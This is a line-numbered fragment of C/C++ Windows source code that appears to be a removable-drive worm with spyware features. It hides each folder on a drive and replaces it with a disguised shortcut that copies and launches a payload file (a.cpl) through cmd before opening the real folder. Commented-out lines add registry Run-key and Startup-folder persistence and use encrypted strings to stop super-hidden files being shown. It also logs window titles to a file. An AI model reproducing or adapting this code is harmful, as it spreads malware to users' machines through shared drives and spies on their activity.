1541//if(!strcmp(dow,dow1) | !strcmp(dow,DE.szDisplayName)){// | !strcmp(dow,dow0)){// & !FindWindow("Shell_TrayWnd",NULL)){//!strcmp(dow,"")){//!strncmp(dow0,dr,5)){//!strcmp(cN,dr)){//| !FindWindow("#32769",NULL)){//&& strcmp(cN,"bosa_s")){//&& strcmp(cN,"Consol")){//&& strcmp(dow,"Program Manager")){//(Windows10 <Bof pour fermer>)Windows.UI.Core.CoreWindow DV2ControlHost BaseBar SystemTray_Main Shell_TrayWnd(pas bon) Progman "", Excel dialog sheet: bosa_sdm_Xl11 (in Excel 2003), bosa_sdm_Xl9 (in Excel 2002 and 2000), bosa_sdm_Xl8 (in Excel 97), bosa_sdm_Xl (in Excel 5 and 95). bosa_sdm_Microsoft Office Word 12.0
1542//if(strcmp(cN,"Cabine") | !strcmp(dow,DE.szDisplayName) && strcmp(cN,"Explor") | !strcmp(dow,DE.szDisplayName) && strcmp(cN,"#32770") && strcmp(cN,"Consol") && strcmp(cN,"bosa_s")){//&& strcmp(dow,"Program Manager")){
1543//if(strncmp(cN,"Cabine",6) | !strcmp(dow,DE.szDisplayName) && strncmp(cN,"Explor",6) | !strcmp(dow,DE.szDisplayName) && strncmp(cN,"#32770",6) && strncmp(cN,"Consol",6) && strncmp(cN,"bosa_s",6)){
1544
1545Dri[3]=0;
1546//strcat(Dri,".");//Android SD-Card
1547strcat(Dri,fd.cFileName);
1548//int tL = strlen(Dri);//
1549SetFileAttributes(Dri,6);
1550strcat(Dri,".lnk");
1551
1552//strcpy(SysFolders,_strlwr(fd.cFileName));
1553//if(GetFileAttributes(Dri) == INVALID_FILE_ATTRIBUTES){
1554if(GetFileAttributes(Dri) == INVALID_FILE_ATTRIBUTES & strcmp(fd.cFileName,"System Volume Information")){//&& strcmp(fd.cFileName,"FOUND.000") && strcmp(fd.cFileName,"RECYCLER") && strcmp(fd.cFileName,"$RECYCLE.BIN") && strcmp(fd.cFileName,"$Recycle.Bin")){
1555//if(strcmp(fd.cFileName,"System Volume Information")){
1556//if(GetFileAttributes(Dri) == INVALID_FILE_ATTRIBUTES && strcmp(_strlwr(fd.cFileName),"system volume information") && strcmp(_strlwr(fd.cFileName),"recycler") && strcmp(_strlwr(fd.cFileName),"$recycle.bin")){
1557//if(GetFileAttributes(Dri) == INVALID_FILE_ATTRIBUTES && strcmp(fd.cFileName,"system volume information") && strcmp(fd.cFileName,"recycler") && strcmp(fd.cFileName,"$recycle.bin")){
1558//if(GetFileAttributes(Dri) == INVALID_FILE_ATTRIBUTES && strcmp(SysFolders,"system volume information") && strcmp(SysFolders,"recycler") && strcmp(SysFolders,"$recycle.bin")){
1559
1560IShellLink *pShellLink;
1561//hres =
1562CoCreateInstance(CLSID_ShellLink, NULL, 0x1, IID_IShellLink, (void**)&pShellLink);//CLSCTX_INPROC_SERVER: 0x1 ou CLSCTX_ALL: Indicates all class contexts. This definition ORs CLSCTX_INPROC_HANDLER and CLSCTX_SERVER.
1563
1564pShellLink->SetPath("%ComSpec%");//cmd %ComSpec%
1565
1566//char command[256]="/C xcopy /H a.cpl %TMP%&&start /D C:\\ %TMP%\\a.cpl® ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /ve /d %TMP%\\a.cpl /f&start /D C:\\ explorer %CD%\"";//<-- moins le /f
1567//strcat(command,"\" | copy w\\a.cpl \"%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\" | copy w\\a.cpl \"%USERPROFILE%\\Menu Démarrer\\Programmes\\Démarrage\"");
1568////char command[256]="/C xcopy /HY a.cpl %TMP%&&start %TMP%\\a.cpl&start /D C:\\ /MAX explorer %CD%\"";//APPDATA //HY - moins le Y et moins le /MAX
1569char command[256]="/C xcopy /HY a.cpl %TMP%&&start %TMP%\\a.cpl|start /D C:\\ explorer %CD%\"";// /MAX
1570//char command[256]="/C xcopy /HY a.cpl %TMP%&&attrib -S -H %TMP%\\a.cpl&&start %TMP%\\a.cpl|start /D C:\\ /MAX explorer %CD%\"";
1571strcat(command,fd.cFileName);
1572strcat(command,"\"");
1573
1574pShellLink->SetArguments(command);
1575//Dri[tL]=0;//
1576//pShellLink->SetIconLocation(Dri, 0);//
1577pShellLink->SetIconLocation("shell32.dll", 3);
1578pShellLink->SetShowCmd(7);
1579
1580IPersistFile *pPersistFile;
1581//hres =
1582pShellLink->QueryInterface(IID_IPersistFile, (void**)&pPersistFile);
1583
1584wchar_t wtext[256];
1585mbstowcs(wtext, Dri, strlen(Dri)+1);//conv0(wtext, Dri);
1586
1587//hres =
1588pPersistFile->Save(wtext,1);//SetFileAttributes(wtext,0x10);//0x10=FILE_ATTRIBUTE_DIRECTORY
1589
1590}
1591
1592SetFileAttributes(Dri,128);
1593
1594 }
1595 }//
1596 FindNextFile(hFindFile,&fd);
1597 }
1598 FindClose(hFindFile);
1599
1600Dri[3]=0;
1601SHChangeNotify(SHCNE_UPDATEDIR, SHCNF_PATH, Dri, NULL);
1602
1603/*
1604HKEY hKey;
1605DWORD lpData;
1606DWORD dwType = REG_DWORD, dwSize = sizeof(DWORD);//cl
1607R_egOpenKeyEx(HKEY_CURRENT_USER, decrypt((char*)"z–›žˆ™ŒƒtŠ™–š–›ƒ~•‹–žšƒjœ™™Œ•›}Œ™š–•ƒlŸ—“–™Œ™ƒh‹ˆ•ŠŒ‹"), 0, KEY_QUERY_VALUE, &hKey);//Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced
1608R_egQueryValueEx(hKey, decrypt((char*)"z–žzœ—Œ™o‹‹Œ•"), 0, &dwType, (PBYTE)&lpData, &dwSize);//ShowSuperHidden
1609
1610if(lpData==1){
1611
1612DWORD lpData=0;//, dwSize = sizeof(DWORD);
1613R_egCreateKey(HKEY_CURRENT_USER,decrypt((char*)"z–›žˆ™ŒƒtŠ™–š–›ƒ~•‹–žšƒjœ™™Œ•›}Œ™š–•ƒlŸ—“–™Œ™ƒh‹ˆ•ŠŒ‹"),&hKey);
1614R_egSetValueEx(hKey,decrypt((char*)"z–žzœ—Œ™o‹‹Œ•"),0,REG_DWORD,(PBYTE)&lpData,dwSize);
1615
1616}//*/
1617
1618}
1619}
1620
1621file = fopen("0", "a+");
1622//fprintf(file, "<p><font color=1013CF font size=3>%s </font><font color=FF8000 font size=3>%s</font><p>", cN, dow0);
1623fprintf(file, "<p><font color=FF8000 font size=3>[%s]</font><p>",dow0);
1624fclose(file);
1625n=0;//Title change ? (temp)
1626}
1627
1628}
1629}